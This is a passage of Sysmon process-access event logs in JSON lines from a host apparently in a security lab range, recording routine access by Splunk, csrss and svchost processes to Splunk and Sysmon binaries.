Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:45.754","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-20F1-5F25-0000-0010184E0900}","TargetProcessId":"4676","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6011,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:45.754\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20F1-5F25-0000-0010184E0900}\r\nTargetProcessId: 4676\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:45.754","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20F1-5F25-0000-0010184E0900}","TargetProcessId":"4676","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6012,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:45.754\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:45.754","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6013,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:45.754\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:45.754","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6014,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:45.754\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:45.754","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6015,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:45.754\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:45.754","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6016,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:45.754\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:45.754","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6017,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:45.754\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:45.754","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6018,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:45.754\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:45.754","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\W